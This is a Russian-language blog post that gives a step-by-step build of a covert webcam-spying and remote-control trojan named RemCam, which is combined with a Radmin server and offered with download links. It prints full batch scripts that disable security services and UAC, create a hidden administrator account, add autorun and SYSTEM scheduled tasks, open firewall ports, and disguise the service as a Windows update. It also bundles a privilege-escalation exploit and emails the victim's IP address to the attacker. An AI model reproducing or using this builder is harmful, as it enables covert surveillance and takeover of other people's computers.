ads slot

Latest Posts:

Срочно нужен инженер схемотехник! Опыт проектирования схем в Altium Designer; ТК; Подробнее здесь

R&C&B Генератор сервера RemCam и Radmin + отсылка ip на почту

R&C&B Генератор сервера RemCam и Radmin + отсылка ip на почту:




Программа генерит готовый к скрытой установке сервер RemCam,который установится в систему и будет стартовать при каждом входе в систему.
Умеет генерить вирусы следующих конфигураций:
1. Просто сервер RemCam(программа для наблюдения через вебкамеру)
2. Сервер RemCam + Отправка ip для конекта на почтовый ящик
3. Сервер RemCam в привязке с сервером Radmin(2* версии)
4. Сервер RemCam в привязке с сервером Radmin + отправка ip на почту.
С генерированный файл можно называть как угодно,но запуск должен происходить от имени Администратора,иначе будет выдавать ошибку.
Палиться многими антивирусами,в прочем как и сам RemCam, впрочем для использования на Windows 7 не годиться так как палиться и сервер RemCam и сервер Radmin одним защитником Windows,а вот на XP вполне даже актуален,но опять же палят многие антивирусы вроде AVG,касперского,Norton.

Эта тема по сути сборка Iindigo http://www.xaker.name/forvb/showthread.php?t=19713 я в свою очередь только добавил RemCam2 (программа для передачи изображения с Веб Камеры и звука по сети) и внес некоторые изменения с отсылкой ip на почту...

И так,для сборки нам понадобятся:
msi пакет сервера Radmin 3.4 (не требует активации, скрывает иконку в трее, не пишется в пуск и установленные программы)
архив для отправки на email
сплойт Windows Task Scheduler Privilege Escalation
пакет утилит Radmin Deployment tool
программа Bat to Exe Converter
архиватор WinRar
сервер RemCam2

Далее устанавливаем Radmin Deployment tool, после установки запускаем Radmin MSI Configurator, указываем ему на скачанный msi пакет сервера Radmin 3.4, задаём настройки, добавляем пользователя и сохраняем. Я задал имя пользователя admin, пароль 123456 и сохранил пакет под именем msupdate.msi

Cсылка на видео по настройке (от Iindigo) http://www.youtube.com/watch?v=hQm5S75GeYM

Откладываем этот пакет в сторонку,открываем папку ip и начинаем настройку почтового клиента:

ip.bat

Цитата:@echo off

ipconfig /all > localip.txt
realip.exe > realip.txt

ping -n 2 127.0.0.1 > nul

blat.exe -install -server smtp.yandex.ru -port 25 -f логин@yandex.ru -u логин -pw пароль
blat.exe -to логин@yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
blat.exe -to логин@yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"

del /f /q localip.txt
del /f /q realip.txt 

Настраиваем под себя,если будут проблемы с отправкой можно поменять порт 25 на 587(у меня работает на 587)

После того как вы изменили указанные данные на свои, сохраняем файл, закрываем. 
Хочу обратить внимание - если вы не знаете какой адрес и порт вашего smtp сервера, зайдите на сайт и поищите в разделе помощи и часто задаваемых вопросов. Наверняка там найдётся эта информация. Если и здесь вас постигла неудача, зарегистрируйте ящик на yandex.ru и заполните поля по аналогии с вышеуказанным примером.

Далее, запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory. Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. Затем жмём Compile и получаем файл ip.exe

Cсылка на видео по настройке ip:http://www.youtube.com/watch?v=klAIxkpVB1U

Откладываем готовый ip.exe к msupdate.msi.Теперь посмотрим на наш рабочий inst.cmd (есть готовый в скаченном вами архиве):

Цитата:@echo off

if exist c:\users\nul (goto win7) else goto winxp

:win7
ping -n 5 127.0.0.1
start %temp%\poc.exe
ping -n 5 127.0.0.1
goto install

:winxp
net stop Alerter
sc config Alerter start= disabled
net stop wscsvc
sc config wscsvc start= disabled
net stop SharedAccess
sc config SharedAccess start= disabled
sc config TlntSvr start= auto
net start TlntSvr

:install
copy /y "%temp%\ip.exe" "%SYSTEMROOT%/ip.exe"
copy /y "%temp%\cam_server.exe" "%SystemRoot%\cam_server.exe"

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f

attrib +s +h +r "%SYSTEMROOT%/ip.exe"
attrib +s +h +r "%SYSTEMROOT%/cam_server.exe"

netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow
netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow
netsh firewall add allowedprogram "%SYSTEMROOT%\cam_server.exe" "cam_server" ENABLE
netsh firewall add portopening tcp 57011 all

net user HelpAssistant admin /add
net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
net user HelpAssistant /active:yes /comment:""зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
net user HelpAssistant admin

%temp%\msupdate.msi /qn /norestart

start %temp%\ip.exe

ping -n 5 127.0.0.1

attrib +S +H %windir%\system32\rserver30

schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f

cd %SystemRoot%\
start cam_server.exe pass=Пароль port=57011

net stop rserver3
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
net start rserver3 

Интервал отправки ip можно подправить здесь:
schtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe /f

Пароль к RemCam2 здесь:
1.reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\cam_server.exe pass=Пароль port=57011" /f
2.start cam_server.exe pass=Пароль port=57011

Сохрянем файл как inst.cmd. Открываем программу Bat to Exe Converter, выбираем файл inst.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory и жмём Compile. Получаем inst.exe.

Кладём этот файл в кучу к msupdate.msi, ip.exe,cam_server.exe и туда же добавляем наш сплойт - poc.exe. 
В итоге, у нас получилось 5 файлов
1)msupdate.msi - специальный пакет radmin server 3.4
2)ip.exe - программа которая возьмёт ip компьютера и отправит нам их на мыло
3)inst.exe - основной инсталлятор
4)poc.exe - сплойт Windows Task Scheduler Privilege Escalation
5)cam_server.exe-сервер RemCam2

Все 5 файлов объединяем в один самораспаковывающийся архив. Ставим архиватор WinRar. Затем, выделяем файлы и создаем архив. Даём архиву название, к примеру msupdate. В настройках архива ставим галочки напротив "Создать "SFX-архив" и "Протестировать файлы после упаковки". Уровень сжатия ставим максимальный. Далее переходим на вкладку "Дополнительно" и открываем "Параметры SFX".
Вкладка "Общие":
Путь для распаковки - вводим %temp%
Выполнить после распаковки - вводим %temp%\inst.exe

Вкладка "Режимы":
Режим вывода информации - ставим в "Скрыть всё"

Вкладка "Обновление":
Режим перезаписи - ставим в "Перезаписывать все файлы без запроса"
Жмём "Ок" и ещё раз "Ок" для создания архива.
Инсталлятор готов.

Тестил несколько раз все работает,кому что не понятно обращайтесь.

// копирование на другие ресурсы разрешено только с копирайтом и ссылкой на этот топик

Сборка предоставляется исключительно для ознакомления.
Использование данной сборки влечет за собой ответственность согласно действующему законодательству.

(с) kirill


Перед скачиванием отключаем антивирус!!!

([-])

http://ge.tt/9StG5NA

http://www.multiupload.com/U5G0WDBFOP

http://www.mediafire.com/?ui7tm4uc20f8cjg
Share on Google Plus

Автор Expert

Я простой житель планеты земля.

Комментарии

comments powered by HyperComments

Алексей Навальный

Мухамеду Али было 74 года

ali from Mab on Vimeo . Он говорил, что хотел бы дожить до ста лет. Мохаммед Али – один из самых известных боксеров в истории мировог...

Получайте обновления на Email

Проблемы на работе?